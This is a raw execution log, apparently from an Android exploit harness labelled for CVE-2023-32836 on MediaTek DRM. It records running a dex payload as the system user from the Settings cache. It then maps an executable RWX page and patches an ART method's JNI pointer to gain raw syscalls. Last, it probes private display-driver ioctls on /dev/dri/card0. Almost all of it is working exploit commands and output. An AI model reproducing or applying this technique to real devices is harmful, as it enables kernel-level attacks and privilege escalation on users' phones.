command=CLASSPATH=/data/data/com.android.settings/cache/drm_trigger.dex app_process64 /system/bin DrmTrigger mtkaeeprobe
probe=drm-trigger
dex_md5=01d31c61bd7600b78187ebb151556c3b
dex_sha256=dbe0e500b964f9aca70f01490b91675c8973b40fdf915cd92f1070ead763277f
remote_dex=/data/data/com.android.settings/cache/drm_trigger.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
01d31c61bd7600b78187ebb151556c3b  /data/data/com.android.settings/cache/drm_trigger.dex
[*] CVE-2023-32836 DRM exploit (Java/dalvikvm)
[*] pid=6115 uid=1000 mode=mtkaeeprobe
[*] === MTK private DRM AEE/report probe phase0 ===

[*] Whitelisted non-blocking ioctls only.
[*] Skips known blocking 0x22/0x31 and known fatal SET_PQPARAM 0xffffffff.
[+] Scratch buffer at 0x7339d34000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7339c54000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x73343d79d0
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x708901a2c0
    entry_point    = 0x1038000800406858
[*] Patching data_ (JNI) → 0x7339c54000
    data_       = 0x7339c54000 ✓
    entry_point = 0x1038000800406858 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[*] openat /dev/dri/card0 ret=48
[*] MTK_PQ_PERSIST_PROPERTY zero cmd=0xc080645f len=128 w0=0x0 ret=0 elapsed_ms=0
    words: [0]=0x0 [1]=0x0 [2]=0x0 [3]=0x0 [4]=0x0 [5]=0x0 [6]=0x0 [7]=0x0
[*] MTK_CCORR_EVENTCTL zero cmd=0xc0046461 len=4 w0=0x0 ret=0 elapsed_ms=1
    words: [0]=0x0
[*] MTK_MUTEX_CONTROL invalid0 cmd=0xc0046467 len=4 w0=0x0 ret=-14 (EFAULT) elapsed_ms=0
    words: [0]=0x0
[*] MTK_BYPASS_COLOR zero cmd=0xc004646a len=4 w0=0x0 ret=0 elapsed_ms=0
    words: [0]=0x0
[*] MTK_PQ_SET_WINDOW zero cmd=0xc014646b len=20 w0=0x0 ret=0 elapsed_ms=1
    words: [0]=0x0 [1]=0x0 [2]=0x0 [3]=0x0 [4]=0x0
[*] MTK_SUPPORT_COLOR_TRANSFORM zero cmd=0xc040646d len=64 w0=0x0 ret=0 elapsed_ms=1
    words: [0]=0x0 [1]=0x0 [2]=0x0 [3]=0x0 [4]=0x0 [5]=0x0 [6]=0x0 [7]=0x0
[*] MTK_AAL_EVENTCTL zero cmd=0xc0046473 len=4 w0=0x0 ret=0 elapsed_ms=0
    words: [0]=0x0
[*] MTK_AAL_INIT_DRE30 zero cmd=0xc0086474 len=12 w0=0x0 ret=0 elapsed_ms=0
    words: [0]=0x0 [1]=0x0 [2]=0x0
[*] MTK_DEBUG_LOG zero cmd=0xc004647e len=4 w0=0x0 ret=0 elapsed_ms=0
    words: [0]=0x0
[*] MTK_SUPPORT_SLD zero cmd=0xc0016496 len=1 w0=0x0 ret=0 elapsed_ms=0
    words: [0]=0x0
[*] MTK_SET_PQPARAM u4PartialY=22 ret=0
    words: [0]=0x0 [1]=0x0 [2]=0x16 [3]=0x0 [4]=0x0 [5]=0x0 [6]=0x0 [7]=0x0
[*] MTK_SET_PQPARAM restore zero ret=0
[*] Done
